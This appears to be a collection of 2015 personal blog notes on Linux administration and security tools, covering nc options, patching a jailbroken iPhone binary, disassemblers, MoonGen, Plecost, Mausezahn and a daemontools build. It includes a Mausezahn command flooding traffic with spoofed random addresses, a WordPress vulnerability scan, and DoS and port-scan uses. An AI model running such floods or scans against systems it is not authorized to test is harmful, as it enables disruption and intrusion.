-X proxy_protocol    Requests that nc should use the specified protocol when talking to the proxy server. Supported protocols are "4" (SOCKS v.4), "5" (SOCKS v.5) and "connect" (HTTPS proxy). If the protocol is not specified, SOCKS version 5 is used.
-x proxy_address[:port]    Requests that nc should connect to destination using a proxy at proxy_address and port. If port is not specified, the well-known port for the proxy protocol is used (1080 for SOCKS, 3128 for HTTPS).
-Z    DCCP mode.
-z    Specifies that nc should just scan for listening daemons, without sending any data to them. It is an error to use this option in conjunction with the -l option.

iphone: Illegal instruction: 4 hatası

jailbroken iPhone device (the sed command below patches /usr/bin/aSMS in place by rewriting specific instruction byte sequences, so back up the binary first and expect the patch to be specific to this build; ldid is then run to re-sign the modified binary, and the libssl.0.9.7 → 0.9.8 symlink only papers over a missing-library error — the two OpenSSL releases are not ABI-compatible and both are long unsupported, so the program may still misbehave):

iPhone:/ root# ./usr/bin/aSMS
Illegal instruction: 4

iPhone:/ root# sed -i'' 's/\x00\x30\x93\xe4/\x00\x30\x93\xe5/g;s/\x00\x30\xd3\xe4/\x00\x30\xd3\xe5/g;' ./usr/bin/aSMS

iPhone:/ root# ldid -s ./usr/bin/aSMS
ldid.cpp(1205): _assert(signature != NULL); errno=0

iPhone:/ root# /usr/bin/aSMS
1437721353 set_ssl: cannot load libssl.0.9.7.dylib

iPhone:/ root# ls /usr/lib/libssl.*
/usr/lib/libssl.0.9.8.dylib  /usr/lib/libssl.dylib

iPhone:/ root# ln -s /usr/lib/libssl.0.9.8.dylib /usr/lib/libssl.0.9.7.dylib

iPhone:/ root# /usr/bin/aSMS
iPhone:/ root# launchctl load -w /Library/LaunchDaemons/com.googlecode.aSMS.plist

Tuesday, July 7, 2015

"hacking team" hacked

Someone hacked the cyberweapons arms manufacturer Hacking Team and posted 400 GB of internal company data.

Hacking Team is a pretty sleazy company, selling surveillance software to all sorts of authoritarian governments around the world. Reporters Without Borders calls it one of the enemies of the Internet. Citizen Lab has published many reports about their activities.
...
Source: https://www.schneier.com/blog/archives/2015/07/hacking_team_is.html

Slashdot thread. Hacker News thread.

Tixati bittorrent client http://www.tixati.com/

Thursday, June 25, 2015

Disassemblers / decompilers


W32Dasm
W32DASM was an excellent 16/32 bit disassembler for Windows, it seems it is no longer developed. the latest version available is from 2003
Capstone
Capstone is a lightweight multi-platform, multi-architecture disassembly framework.
Some of its features are
  • multi-architectures: Arm, Arm64 (Armv8), Mips, PowerPC, Sparc, SystemZ, XCore & Intel
  • Clean/simple/lightweight/intuitive architecture-neutral API.
  • Provide details on disassembled instruction (called “decomposer” by some others).
  • Provide some semantics of the disassembled instruction, such as list of implicit registers read & written.
  • Implemented in pure C language, with bindings for Python, Ruby, C#, NodeJS, Java, GO, OCaml & Vala available.
  • Native support for Windows & *nix (with Mac OSX, iOS, Android, Linux, *BSD & Solaris confirmed).
  • Thread-safe by design.
  • Special support for embedding into firmware or OS kernel.
  • Distributed under the open source BSD license.
BORG Disassembler
BORG is an excellent Win32 Disassembler with GUI.
DSM Studio Disassembler
DSM Studio is an easy-to-use yet comprehensive application that can aid you in the disassembly and inspection of executables built for the Intel x86 architecture.
Decompiler
Decompiler is an easy-to-use and simple application designed to read program binaries and decompile executable or DLL files. The application is designed to decompile executables for any processor architecture and not be tied to a particular instruction set. Although currently only an x86 front end is implemented, there is nothing preventing you from implementing a 68K, SPARC, or VAX front end if you need one.
Lida - linux interactive disassembler
lida is a fast feature packed interactive ELF disassembler / code-/cryptoanalyzer based on bastards libdisasm
BugDbg x64 v0.7.5
BugDbg x64 is a user-land debugger designed to debug native 64-bit applications. BugDbg is released as Freeware.
distorm3
A lightweight, Easy-to-Use and Fast Disassembler/Decomposer Library for x86/AMD64
Udis86
Udis86 is an easy-to-use, minimalistic disassembler library (libudis86) for the x86 class of instruction set architectures. It has a convenient interface for use in the analysis and instrumentation of binary code.
BeaEngine
This project is a package with a multi-platform x86 and x64 disassembler library (Solaris, MAC OSX, AIX, Irix, OS/2, Linux, Windows)
C4 Decompiler
  • General Machine Code to C Decompiler
  • Free Windows I64 target edition
  • Interactive Windows GUI

REC Studio 4 - Reverse Engineering Compiler
REC Studio is an interactive decompiler. It reads a Windows, Linux, Mac OS X or raw executable file, and attempts to produce a C-like representation of the code and data used to build the executable file. It has been designed to read files produced for many different targets, and it has been compiled on several host systems.
Retargetable Decompiler
A retargetable decompiler that can be utilized for source code recovery, static malware analysis, etc. The decompiler is supposed to be not bounded to any particular target architecture, operating system, or executable file format.
miasm
Miasm is a free and open source (GPLv2) reverse engineering framework written in Python. Miasm aims at analyzing/modifying/generating binary programs.
Free Code Manipulation Library
This is a general purpose machine code manipulation library for IA-32 and Intel 64 architectures. The library supports UNIX-like systems as well as Windows and is highly portable. The FCML library is free for commercial and non-commercial use as long as the terms of the LGPL license are met. Currently it supports such features as:
  • A one-line disassembler
  • A one-line assembler
  • An experimental multi-pass load-and-go assembler (Multi line!)
  • Support for the Intel and AT&T syntax
  • An instruction renderer
  • An instruction parser
  • Instructions represented as generic models
  • UNIX/GNU/Linux and Windows support
  • Portable - written entirely in C (no external dependencies)
  • Supported instruction sets: MMX, 3D-Now!, SSE, SSE2, SSE3, SSSE3, SSE4.1, SSE4.2, SSE4A, AVX, AVX2, AES, TBM, BMI1, BMI2, HLE, ADX, CLMUL, RDRAND, RDSEED, FMA, FMA4, LWP, SVM, XOP, VMX, SMX

Examining an ELF binary with binutils

strings:       strings /usr/bin/who
dependencies:  ldd /usr/bin/yes   (never run ldd on an untrusted or suspect binary — it may execute it; use `readelf -d FILE | grep NEEDED` or `objdump -p FILE` instead)
symbols:       nm -D -l -S /usr/bin/yes
sections:      objdump -h /usr/bin/who
data:          objdump -s -j .rodata /usr/bin/who
code:          objdump -d -r -j .text /usr/bin/who

linux: mounting dirty ext3 filesystems

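# Forensic mount of an unclean ext3 image: read-only, and "noload" skips the
# journal replay that a plain "ro" mount of ext3 would still perform (which
# modifies the image).  noexec/nosuid/nodev stop executables, set-uid bits
# and device nodes stored inside the untrusted image from being honoured on
# the host.  If the image is evidence, hash it before and after mounting.
# mount -o loop,ro,noexec,nosuid,nodev,noload diskimage.img /media/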

Thursday, June 4, 2015

moongen: fully scriptable high-speed packet generator

MoonGen is a fully scriptable high-speed packet generator built on DPDK and LuaJIT. It can saturate a 10 GBit connection with 64 byte packets on a single CPU core while executing user-provided Lua scripts for each packet.




Multi-core support allows for even higher rates. It also features precise and accurate timestamping and rate control

https://www.kernel.org/doc/Documentation/vm/hugetlbpage.txt

echo 128 > /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages
mkdir /mnt/huge
mount -t hugetlbfs nodev /mnt/huge


Installation steps

  1.  Install the dependencies (see below)
  2.  git submodule update --init
  3.  ./build.sh
  4.  ./setup-hugetlbfs.sh
  5.  Run MoonGen from the build directory

## Dependencies
  • gcc
  • make
  • cmake
  • kernel headers (for the DPDK igb-uio driver)


Platform:

root@aliokan-xubuntu:/usr/src/MoonGen/build# uname -a
Linux aliokan-xubuntu 3.13.0-53-generic #89-Ubuntu SMP Wed May 20 10:34:39 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 

root@aliokan-xubuntu:/usr/src/MoonGen/build# lsb_release -a
No LSB modules are available.
Distributor ID:    Ubuntu
Description:    Ubuntu 14.04.2 LTS
Release:    14.04
Codename:    trusty


# ./MoonGen quality-of-service-test.lua
EAL: Detected lcore 0 as core 0 on socket 0
EAL: Detected lcore 1 as core 1 on socket 0
EAL: Detected lcore 2 as core 2 on socket 0
EAL: Detected lcore 3 as core 3 on socket 0
EAL: Support maximum 64 logical core(s) by configuration.
EAL: Detected 4 lcore(s)
EAL: No free hugepages reported in hugepages-2048kB
PANIC in rte_eal_init():
Cannot get hugepage information
11: [./MoonGen() [0x416c23]]
10: [/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf5) [0x7fb133556ec5]]
9: [./MoonGen(main+0x7c) [0x41693c]]
8: [/usr/src/MoonGen/deps/luajit/usr/local/lib/libluajit-5.1.so.2(lua_pcall+0x2d) [0x7fb1344570cd]]
7: [/usr/src/MoonGen/deps/luajit/usr/local/lib/libluajit-5.1.so.2(+0xa5d3) [0x7fb1344485d3]]
6: [/usr/src/MoonGen/deps/luajit/usr/local/lib/libluajit-5.1.so.2(+0x5ce66) [0x7fb13449ae66]]
5: [/usr/src/MoonGen/deps/luajit/usr/local/lib/libluajit-5.1.so.2(+0x49084) [0x7fb134487084]]
4: [/usr/src/MoonGen/deps/luajit/usr/local/lib/libluajit-5.1.so.2(+0xc6d0) [0x7fb13444a6d0]]
3: [./MoonGen(rte_eal_init+0xf83) [0x427173]]
2: [./MoonGen(__rte_panic+0xc9) [0x4167a9]]
1: [./MoonGen(rte_dump_


Çözüm:

root@aliokan-xubuntu:/usr/src/MoonGen/build# grep Huge /proc/meminfo
AnonHugePages:    223232 kB
HugePages_Total:       0
HugePages_Free:        0

HugePages_Rsvd:        0
HugePages_Surp:        0
Hugepagesize:       2048 kB


root@aliokan-xubuntu:/usr/src/MoonGen/build# echo 20 > /proc/sys/vm/nr_hugepages

root@aliokan-xubuntu:/usr/src/MoonGen/build# grep Huge /proc/meminfo
AnonHugePages:    223232 kB
HugePages_Total:      20
HugePages_Free:       20

HugePages_Rsvd:        0
HugePages_Surp:        0
Hugepagesize:       2048 kB


logs: https://gist.github.com/anonymous/e517b7ccd8c6a0d6f682

http://www.cnblogs.com/zzqcn/p/4024205.html 

Wednesday, May 20, 2015

pentest: plecost

What's Plecost?

Plecost is a vulnerability fingerprinting and vulnerability finder for Wordpress blog engine

Installation

Installing Plecost is easy:
$ python3 -m pip install plecost
Scanning a web site is just as simple (only against sites you are authorized to test — the scan is noisy and fingerprints the target):
$ plecost http://SITE.com

pentest: mz - mausezahn

Mausezahn is a free fast traffic generator written in C which allows you to send nearly every possible and impossible packet. It is mainly used to test VoIP or multicast networks but also for security audits to check whether your systems are hardened enough for specific attacks.

Mausezahn can be used for example:
  • As traffic generator (e. g. to stress multicast networks)
  • To precisely measure jitter (delay variations) between two hosts (e. g. for VoIP-SLA verification)
  • As didactical tool during a datacom lecture or for lab exercises
  • For penetration testing of firewalls and IDS
  • For DoS attacks on networks (for audit purposes of course)
  • To find bugs in network software or appliances
  • For reconnaissance attacks using ping sweeps and port scans
  • To test network behaviour under strange circumstances (stress test, malformed packets, ...)

As of version 0.38, Mausezahn supports the following protocols:
  • ARP
  • BPDU or PVST
  • CDP
  • LLDP
  • IP
  • IGMP
  • UDP
  • TCP (stateless)
  • ICMP (partly)
  • DNS
  • RTP optionally RX-mode for jitter measurements
  • Syslog

multicast test traffic (`-c 0` sends forever and `-A rand -a rand` spoofs random source IP and MAC addresses, so run this only on an isolated lab segment you own):
# mz eth1 -c 0 -d 0 -A rand -a rand -B 226.1.1.1 -t udp dp=123 -P "Multicast test packet"


Linux: dropped packet stats

ifconfig

 ... 
 RX packets:522 errors:0 dropped:0 overruns:0 frame:0
 TX packets:406 errors:0 dropped:0 overruns:0 frame:0
 ...

cat /proc/net/dev

Inter-| Receive ... 
 face | bytes packets errs drop fifo frame ... 
 eth0:  87689 785 0 0 0 0 ...
 ...

cat /proc/net/udp

 so local_address rem_address ... drops
 277: 00000000:0044 00000000:0000 ... 0 
 ...

cat /proc/net/snmp

...
Tcp: ...
Udp: InDatagrams NoPorts InErrors OutDatagrams RcvbufErrors SndbufErrors
Udp: 453 0 0 452 0 0
...
The same files also exist under each process's /proc/&lt;pid&gt;/net/; note they are per network namespace, not per process — two processes in the same namespace show identical counters:

cat /proc/<pid>/net/{udp,dev,snmp}

Thursday, May 7, 2015

github command line: remember credentials for a while

# The "cache" helper keeps the credentials you type in memory (a
# git-credential-cache daemon), here for 3600 s = 1 hour, then forgets them.
# Prefer it over the "store" helper, which saves the password in plain text
# in ~/.git-credentials; a scoped personal access token is safer than a
# password either way.
$ git config --global credential.helper "cache --timeout=3600"

Howto compile Bernstein’s daemontools on Ubuntu 14.04.2 LTS

aokanx@aokanx-VirtualBox:~/Downloads/admin/daemontools-0.76$ ./package/install
Linking ./src/* into ./compile...
Compiling everything in ./compile...
sh find-systype.sh > systype
rm -f compile
sh print-cc.sh > compile
...
./load envdir unix.a byte.a
/usr/bin/ld: errno: TLS definition in /lib/x86_64-linux-gnu/libc.so.6 section .tbss mismatches non-TLS reference in envdir.o
/lib/x86_64-linux-gnu/libc.so.6: error adding symbols: Bad value
collect2: error: ld returned 1 exit status
make: *** [envdir] Error 1


Solution:
Add gcc parameter: -include /usr/include/errno.h to admin/daemontools-0.76/src/conf-cc

Compile:
aokanx@aokanx-VirtualBox:~/Downloads/admin/daemontools-0.76$ sudo ./package/install
[sudo] password for aokanx:
Linking ./src/* into ./compile...
Compiling everything in ./compile...
make: Nothing to be done for `default'.
Copying commands into ./command...
Creating symlink daemontools -> daemontools-0.76...
Making command links in /command...
Making compatibility links in /usr/local/bin...
Creating /service...
Adding svscanboot to /etc/rc.local...
Reboot now to start svscan.






Startup settings:
aokanx@aokanx-VirtualBox:~/Downloads/admin/daemontools-0.76$ cat /etc/rc.local
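#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.

# Start daemontools' svscan supervisor tree (as root, like everything in
# rc.local).  ./package/install appends this line to the END of rc.local,
# i.e. after the stock "exit 0" above — where it is never reached, so
# svscan never started.  It has to come BEFORE the exit.
# csh is typically not present on a stock Ubuntu install; with "sh -e" a
# missing interpreter aborts the script with a non-zero status, so make
# sure it is installed (or run /command/svscanboot under sh instead).
csh -cf '/command/svscanboot &'

exit 0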